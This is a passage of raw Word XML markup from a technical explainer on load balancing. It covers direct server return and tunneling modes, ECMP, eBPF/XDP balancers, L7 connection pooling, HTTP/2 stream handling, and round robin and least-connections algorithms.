        <w:t>, bypassing the LB on the return path. This is the most performant mode — the LB only handles request traffic, not response traffic. Response traffic (typically larger — HTML pages, images, API responses) goes directly from backend to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F935D32" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP Tunneling mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> LB encapsulates packets in an IP-in-IP tunnel to backends. Backends don't need to be on the same Layer 2 network as the LB — they can be geographically distributed. Backends respond directly to clients. Useful for geographic load distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436B0D72" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ECMP (Equal-Cost Multi-Path) routing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> At the network layer (BGP/OSPF), multiple paths of equal cost to the same destination. Routers distribute flows (not packets) across all equal-cost paths using consistent hashing of the 5-tuple. This provides L3-level load balancing without any dedicated load balancer hardware — the routing fabric distributes traffic. Used by hyperscalers (Google, Facebook) as the first tier of load balancing, before traffic even reaches the L4 LB cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEFB6C9" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eBPF-based load balancing (Cilium, Facebook Katran):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> eBPF (extended Berkeley Packet Filter) allows </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arbitrary programs to run in the kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> at packet processing hooks, without modifying the kernel source. Modern load balancers like Facebook's Katran and Cilium's kube-proxy replacement implement L4 load balancing entirely in eBPF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13443E33" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Programs attach to the </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XDP (eXpress Data Path)</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> hook — the earliest possible point in the packet processing pipeline, before the kernel's network stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C12E3B3" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>XDP programs run before any memory allocation for the packet — maximum performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB61435" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Can process packets at </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>line rate</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (the speed of the NIC, not limited by kernel processing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53320859" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Facebook's Katran processes </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>millions of packets per second per CPU core</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> with negligible CPU overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41772908" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The eBPF program maintains a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BPF map</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (a key-value store in kernel memory) containing the load balancing state — backend lists, weights, connection tracking entries. User-space control plane processes update the BPF maps. Data plane (eBPF) reads them lock-free using RCU (Read-Copy-Update) synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136DE490" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 7 — Application-Aware Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E614D1" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The connection lifecycle at L7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB99216" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>A key performance consideration at L7 is </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>connection management</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>. For every client connection, the L7 LB needs a corresponding backend connection. Managing these efficiently is critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2608B9" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client-side connection management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29538F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Modern browsers open multiple connections per domain (HTTP/1.1: up to 6; HTTP/2: 1 multiplexed connection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E777130" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The LB accepts these connections and manages the TLS state for each.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173E08EB" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS session resumption</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (session tickets in TLS 1.3) allows clients to reconnect without full handshake — the LB must maintain session ticket state across restarts or share it across LB instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E8E7FA" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backend connection pooling:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Rather than opening a new TCP connection to a backend for every client request (expensive: TCP handshake + TLS handshake = 2–3 RTTs), the L7 LB maintains a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>connection pool</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> per backend. Idle connections are kept alive (with TCP keepalives) and reused for subsequent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F183C09" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pool management parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC3F36B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Min connections:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Always maintain at least N connections to each backend (pre-warmed pool).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5E3B05" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Max connections:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Never exceed M connections per backend (backpressure limit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090AFF11" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idle timeout:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Close connections unused for X seconds (free resources).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7F743" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Max lifetime:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Close connections after Y seconds regardless of activity (prevents stale connections and forces periodic reconnection — catches backends that silently drop old connections).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F056EC7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 multiplexing at the LB:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> HTTP/2 introduces significant complexity for L7 load balancers. A single HTTP/2 connection carries multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>streams</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (requests) simultaneously. The LB must:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E778CEC" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Receive streams from the client connection (each stream is an independent request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B66489F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Demultiplex</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> streams — separate them into individual requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFCE496" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Route each request to potentially different backends (based on URL path, headers, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA2CC0" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>Multiplex responses back onto the client connection in the correct stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F3AEEC" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>This requires the LB to maintain per-stream state — which backend each stream was routed to, stream priority weights, flow control windows. Envoy Proxy handles this with a sophisticated HTTP/2 codec that tracks stream state in memory-efficient structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8A602A" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 load balancing at request granularity:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> With HTTP/1.1, load balancing occurs at connection granularity (one request per connection, mostly). With HTTP/2, since multiple requests share a connection, you can load balance at </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>request granularity</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — each request in a multiplexed connection can go to a different backend. This is much more precise than connection-level load balancing, particularly for workloads with variable request processing times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0397E93A" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="0FE0E0F2">
          <v:rect id="_x0000_i2534" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DB11DC" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Load Balancing Algorithms — Full Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7049232C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Round Robin — Why It Fails and When It Doesn't</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D751BC" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Round robin is implemented as an </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atomic counter</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — backend_index = atomic_increment(counter) % num_backends. Each increment and modulo operation is a single CPU instruction cycle. The counter is shared across all request-handling threads, making it truly concurrent without locks (on platforms with native atomic operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6771CA" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why it fails for heterogeneous workloads:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Round robin assumes all requests are equal and all backends are equal. Both assumptions are routinely false. A request that triggers a complex database query takes 500ms; a cache-hit request takes 2ms. Backend A has 32 cores; Backend B has 8 cores (during gradual rollout). Round robin ignores both realities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8519B7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When it works well:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Stateless backends with homogeneous hardware, short-duration requests with similar processing times, and workloads where individual request variance is low (e.g., a simple key-value lookup service). In these conditions, statistical averaging ensures approximately even distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33385853" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weighted Round Robin:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Each backend has an integer weight. A backend with weight 3 receives 3 requests for every 1 request to a weight-1 backend. Implementation: the </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interleaved Weighted Round Robin (IWRR)</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> algorithm generates a sequence that distributes weights evenly (not in blocks). For weights [3, 2, 1] for backends [A, B, C], the sequence is A, B, A, C, B, A — interleaved rather than AAA, BB, C. This prevents bursty routing to high-weight backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A12FA3" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Smooth Weighted Round Robin (Nginx implementation):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Maintains a current_weight per backend, initialized to configured weight. On each request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AD3EA2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="245"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>Increment each backend's current_weight by its configured weight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76488C17" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="245"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Select the backend with the highest current_weight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583333E2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="245"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Subtract the sum of all weights from the selected backend's current_weight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5A43BD" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>This produces maximally smooth distribution — no two consecutive requests to the same backend unless it's the only one. For weights [5, 3, 2], the sequence has no runs of the same backend despite one backend getting 50% of traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E56CF3" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Least Connections — The Internal Data Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70915E19" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Naive implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> An array of connection counts, one per backend. On each request, scan all backends to find the minimum. O(N) per request — acceptable for small N (≤10 backends), unacceptable for large N (100+ backends).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D3CB4A" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Heap-based implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Maintain backends in a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>min-heap</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> ordered by connection count. Finding the backend with fewest connections: O(1). Updating connection count after assignment or completion: O(log N). This is optimal for large backend pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2A8011" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenge: Concurrent updates:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> In a multi-threaded load balancer, multiple threads simultaneously process requests and update connection counts. Naive locking (mutex per backend count) causes contention. Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7FF021" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-CPU counters:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Each CPU core maintains its own count. Global count = sum of per-CPU counts. Updating is wait-free (update local CPU's count). Reading global count requires summing all CPU counts. Works when updates are frequent and reads are infrequent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332C07AB" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Atomic integers:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Each backend has an atomic int64 connection count. Increment/decrement with compare-and-swap. Fast for low-contention scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2EF141" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approximate counts:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Accept slightly stale connection counts. Read without locks, update without locks. Occasional inconsistency causes slightly suboptimal routing but never catastrophic failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EA250E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The connection count vs load mismatch:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Connection count is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> for server load. It's imprecise because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9C46C7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Long-running connections (streaming, WebSocket, long-polling) hold a connection open while consuming minimal server resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75541F13" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Short-lived connections (quick API calls) release connections quickly but may have consumed significant CPU while active.</w:t>
      </w:r>
    </w:p>
